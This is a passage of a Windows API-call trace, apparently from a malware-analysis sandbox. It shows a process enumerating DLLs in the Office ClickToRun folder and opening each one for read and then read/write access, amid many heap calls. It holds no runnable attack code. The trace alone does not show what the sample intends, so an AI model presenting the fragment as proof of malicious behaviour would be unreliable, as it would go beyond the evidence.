(HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0074.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0074.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0074.095] AreFileApisANSI () returned 1 [0074.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0074.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x5a6b8 [0074.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 92 [0074.095] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.095] GetFileType (hFile=0x42c) returned 0x1 [0074.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.095] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.095] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.095] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.096] CloseHandle (hObject=0x42c) returned 1 [0074.096] AreFileApisANSI () returned 1 [0074.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0074.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x5a6b8 [0074.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 92 [0074.096] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.096] GetFileType (hFile=0x42c) returned 0x1 [0074.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.096] CloseHandle (hObject=0x42c) returned 1 [0074.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0074.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0074.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0074.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0074.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0074.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0074.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0074.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0074.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0074.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0074.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0074.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0074.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0074.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0074.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0074.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0074.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0074.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0074.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0074.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0074.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0074.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0074.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0074.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0074.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0074.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0074.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0074.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0074.098] AreFileApisANSI () returned 1 [0074.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0074.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x5a6b8 [0074.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 92 [0074.098] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x2d60)) returned 1 [0074.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0074.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0074.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.098] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-crt-conio-l1-1-0.dll", cAlternateFileName="AP5C76~1.DLL")) returned 1 [0074.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0074.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0074.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0074.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0074.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0074.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0074.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0074.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0074.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0074.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0074.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0074.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0074.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0074.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0074.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0074.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0074.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0074.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.099] AreFileApisANSI () returned 1 [0074.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 90 [0074.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0074.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0074.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0074.099] AreFileApisANSI () returned 1 [0074.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0074.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x5a6b8 [0074.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 90 [0074.100] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.100] GetFileType (hFile=0x42c) returned 0x1 [0074.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.100] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.100] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.100] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.100] CloseHandle (hObject=0x42c) returned 1 [0074.101] AreFileApisANSI () returned 1 [0074.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0074.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x5a6b8 [0074.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 90 [0074.101] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.101] GetFileType (hFile=0x42c) returned 0x1 [0074.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.101] CloseHandle (hObject=0x42c) returned 1 [0074.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0074.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0074.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0074.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0074.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0074.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0074.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0074.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0074.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0074.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0074.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x32318 [0074.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x32318 | out: hHeap=0x20000) returned 1 [0074.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x32318 [0074.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x32318 | out: hHeap=0x20000) returned 1 [0074.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.270] AreFileApisANSI () returned 1 [0074.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0074.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x5a6b8 [0074.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 90 [0074.271] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0)) returned 1 [0074.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0074.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 